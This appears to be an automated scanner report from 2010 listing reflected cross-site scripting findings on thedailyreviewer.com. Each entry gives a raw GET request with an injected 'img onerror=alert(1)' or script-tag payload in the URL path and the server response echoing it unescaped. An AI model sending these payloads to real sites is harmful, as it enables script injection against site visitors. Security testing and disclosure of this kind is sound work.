HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:31:01 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=9eee750156853aa32976fec310581dd3; expires=Wed, 12-Dec-2035 00:31:01 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with m52cd3<img src=a onerror=alert(1)>bc6908de3fc</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e52e2<img%20src%3da%20onerror%3dalert(1)>b3fb6863bfa was submitted in the REST URL parameter 3. This input was echoed as e52e2<img src=a onerror=alert(1)>b3fb6863bfa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/ne52e2<img%20src%3da%20onerror%3dalert(1)>b3fb6863bfa HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:31:04 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=45673970d26c4c1dac58d58ca654089a; expires=Wed, 12-Dec-2035 00:31:04 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with ne52e2<img src=a onerror=alert(1)>b3fb6863bfa</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cd35c<img%20src%3da%20onerror%3dalert(1)>9e57969e7b4 was submitted in the REST URL parameter 3. This input was echoed as cd35c<img src=a onerror=alert(1)>9e57969e7b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/ocd35c<img%20src%3da%20onerror%3dalert(1)>9e57969e7b4 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:31:01 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=5e8ba0033ae25ed0f178dfb1d73e62d1; expires=Wed, 12-Dec-2035 00:31:01 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with ocd35c<img src=a onerror=alert(1)>9e57969e7b4</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fad4c<img%20src%3da%20onerror%3dalert(1)>f120133018d was submitted in the REST URL parameter 3. This input was echoed as fad4c<img src=a onerror=alert(1)>f120133018d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/pfad4c<img%20src%3da%20onerror%3dalert(1)>f120133018d HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:31:13 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=0b2844cdf2e55243b710dc0cfe79b619; expires=Wed, 12-Dec-2035 00:31:13 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with pfad4c<img src=a onerror=alert(1)>f120133018d</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1c4e5<img%20src%3da%20onerror%3dalert(1)>9cfada59b25 was submitted in the REST URL parameter 3. This input was echoed as 1c4e5<img src=a onerror=alert(1)>9cfada59b25 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/q1c4e5<img%20src%3da%20onerror%3dalert(1)>9cfada59b25 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:31:19 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=f5fe473daf349138794941518b0cf55f; expires=Wed, 12-Dec-2035 00:31:20 GMT; path=/ Content-Length: 11731 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with q1c4e5<img src=a onerror=alert(1)>9cfada59b25</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dc1ab<img%20src%3da%20onerror%3dalert(1)>25b6d3502e7 was submitted in the REST URL parameter 3. This input was echoed as dc1ab<img src=a onerror=alert(1)>25b6d3502e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/rdc1ab<img%20src%3da%20onerror%3dalert(1)>25b6d3502e7 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:31:23 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=0741d30db1ebc6c155b940e19988971b; expires=Wed, 12-Dec-2035 00:31:24 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with rdc1ab<img src=a onerror=alert(1)>25b6d3502e7</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eb187<img%20src%3da%20onerror%3dalert(1)>45622596c44 was submitted in the REST URL parameter 3. This input was echoed as eb187<img src=a onerror=alert(1)>45622596c44 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/seb187<img%20src%3da%20onerror%3dalert(1)>45622596c44 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:31:33 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=c3a8dc6214f3d4e004eb7702bffb17fe; expires=Wed, 12-Dec-2035 00:31:33 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with seb187<img src=a onerror=alert(1)>45622596c44</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a1f3a<img%20src%3da%20onerror%3dalert(1)>63a21b10329 was submitted in the REST URL parameter 3. This input was echoed as a1f3a<img src=a onerror=alert(1)>63a21b10329 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/ta1f3a<img%20src%3da%20onerror%3dalert(1)>63a21b10329 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:31:38 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=85c4d009a01091a415fc00d558fdd2a5; expires=Wed, 12-Dec-2035 00:31:38 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with ta1f3a<img src=a onerror=alert(1)>63a21b10329</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b1fbb<img%20src%3da%20onerror%3dalert(1)>cffacca60fa was submitted in the REST URL parameter 3. This input was echoed as b1fbb<img src=a onerror=alert(1)>cffacca60fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/ub1fbb<img%20src%3da%20onerror%3dalert(1)>cffacca60fa HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:31:51 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=094e378e337ce3c550204bd6fe5392b9; expires=Wed, 12-Dec-2035 00:31:51 GMT; path=/ Content-Length: 11731 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with ub1fbb<img src=a onerror=alert(1)>cffacca60fa</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d0006<img%20src%3da%20onerror%3dalert(1)>2332ebb1fa was submitted in the REST URL parameter 3. This input was echoed as d0006<img src=a onerror=alert(1)>2332ebb1fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/vd0006<img%20src%3da%20onerror%3dalert(1)>2332ebb1fa HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:31:54 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=a78c816ee47c90ecb397e58b6c11a8aa; expires=Wed, 12-Dec-2035 00:31:55 GMT; path=/ Content-Length: 11730 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with vd0006<img src=a onerror=alert(1)>2332ebb1fa</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c40e7<img%20src%3da%20onerror%3dalert(1)>c1faae8aecc was submitted in the REST URL parameter 3. This input was echoed as c40e7<img src=a onerror=alert(1)>c1faae8aecc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/wc40e7<img%20src%3da%20onerror%3dalert(1)>c1faae8aecc HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:07 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=a4f52ad0ca3f2b00726f6052afc17d1e; expires=Wed, 12-Dec-2035 00:32:07 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with wc40e7<img src=a onerror=alert(1)>c1faae8aecc</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 27e03<img%20src%3da%20onerror%3dalert(1)>37a8f24879b was submitted in the REST URL parameter 3. This input was echoed as 27e03<img src=a onerror=alert(1)>37a8f24879b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/x27e03<img%20src%3da%20onerror%3dalert(1)>37a8f24879b HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:08 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=04f830c83d18907899ac879efb34c096; expires=Wed, 12-Dec-2035 00:32:08 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with x27e03<img src=a onerror=alert(1)>37a8f24879b</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9a916<img%20src%3da%20onerror%3dalert(1)>d591c0efd was submitted in the REST URL parameter 3. This input was echoed as 9a916<img src=a onerror=alert(1)>d591c0efd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/y9a916<img%20src%3da%20onerror%3dalert(1)>d591c0efd HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:37 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=8d89e3c51dbe8238c65cae460302eef9; expires=Wed, 12-Dec-2035 00:32:38 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11729
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with y9a916<img src=a onerror=alert(1)>d591c0efd</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8760b<img%20src%3da%20onerror%3dalert(1)>3c1e1cd7436 was submitted in the REST URL parameter 3. This input was echoed as 8760b<img src=a onerror=alert(1)>3c1e1cd7436 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/z8760b<img%20src%3da%20onerror%3dalert(1)>3c1e1cd7436 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:32 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=fe4896c753bdf640ad8f41f812a01da4; expires=Wed, 12-Dec-2035 00:32:33 GMT; path=/ Content-Length: 11731 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with z8760b<img src=a onerror=alert(1)>3c1e1cd7436</h1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 168a7"><script>alert(1)</script>9d0872809cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/baseball168a7"><script>alert(1)</script>9d0872809cc HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:18 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=1018fe022a6b0d95109bc2bb240db5e2; expires=Wed, 12-Dec-2035 00:33:19 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15303
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/baseball168a7"><script>alert(1)</script>9d0872809cc%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b3c22<img%20src%3da%20onerror%3dalert(1)>5cd3a5ef8ec was submitted in the REST URL parameter 2. This input was echoed as b3c22<img src=a onerror=alert(1)>5cd3a5ef8ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/baseballb3c22<img%20src%3da%20onerror%3dalert(1)>5cd3a5ef8ec HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:44 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=da66ff70cd3c2c6ef3ada68d898a11a7; expires=Wed, 12-Dec-2035 00:33:44 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76289
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c659f<img%20src%3da%20onerror%3dalert(1)>96f083738ae was submitted in the REST URL parameter 2. This input was echoed as c659f<img src=a onerror=alert(1)>96f083738ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/breaking-newsc659f<img%20src%3da%20onerror%3dalert(1)>96f083738ae HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:57 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=32330a38b9e1371811b57b675061cf6e; expires=Wed, 12-Dec-2035 00:32:58 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76409
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa25a"><script>alert(1)</script>c842b344918 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/breaking-newsaa25a"><script>alert(1)</script>c842b344918 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:33 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=d27d4a7476e06c158e3c648f44358f7e; expires=Wed, 12-Dec-2035 00:32:34 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/breaking-newsaa25a"><script>alert(1)</script>c842b344918%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 62b36<img%20src%3da%20onerror%3dalert(1)>22ab0cec245 was submitted in the REST URL parameter 2. This input was echoed as 62b36<img src=a onerror=alert(1)>22ab0cec245 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/business62b36<img%20src%3da%20onerror%3dalert(1)>22ab0cec245 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:29 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=cbd64c986d1d23ee75618046816b1f38; expires=Wed, 12-Dec-2035 00:33:29 GMT; path=/ Content-Length: 76289 Connection: close Content-Type: text/html; charset=UTF-8
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3c55"><script>alert(1)</script>b15c989737 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
